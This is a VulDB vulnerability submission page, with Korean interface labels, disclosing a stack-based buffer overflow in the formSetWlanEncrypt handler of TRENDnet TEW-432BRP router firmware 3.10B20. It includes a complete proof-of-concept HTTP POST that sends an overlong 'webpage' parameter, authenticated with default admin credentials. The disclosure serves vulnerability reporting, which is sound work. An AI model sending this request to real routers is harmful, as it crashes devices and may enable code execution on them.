제출 #814773: TRENDnet TEW-432BRP 3.10B20 Stack-based Buffer Overflow정보

제목	TRENDnet TEW-432BRP 3.10B20 Stack-based Buffer Overflow
설명	In formSetWlanEncrypt function, webpage is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow, so we can control the webpage to execute arbitrary code. POST /goform/formSetWlanEncrypt HTTP/1.1 Host: 192.168.10.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 1169 Origin: http://192.168.10.1 Authorization: Basic YWRtaW46YWRtaW4= Connection: keep-alive Referer: http://192.168.10.1/wlan_security.asp?t=1777347015970 Upgrade-Insecure-Requests: 1 wep_type=1&auth_type=2&wep_key_type=0&wep_key_len=5&wep_def_key=0&key1=0000000000&key2=0000000000&key3=0000000000&key4=0000000000&eap_type=0&cipher_type=0&wpapsk1=12345678&wpapsk2=12345678&radius_ip1=x.x.x.x&radius_port1=1812&radius_pass1=&radius_ip2=x.x.x.x&radius_port2=1812&radius_pass2=&save=1&restore_wireless=&webpage=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&Action=onchange&wps_clear_configure_by_reg=0
원천	⚠️ https://github.com/wudipjq/my_vuln/blob/main/TRENDnet/vuln_16/16.md
사용자	pjq_Buoy (UID 97666)
제출	2026. 04. 28. AM 09:14 (1 월 ago)
모더레이션	2026. 05. 30. PM 06:28 (1 month later)
상태	수락
VulDB 항목	367460 [TRENDnet TEW-432BRP 3.10B20 formSetWlanEncrypt webpage 메모리 손상]
포인트들	20

◂ 이전 개요 다음 ▸

Do you need the next level of professionalism?

Upgrade your account now!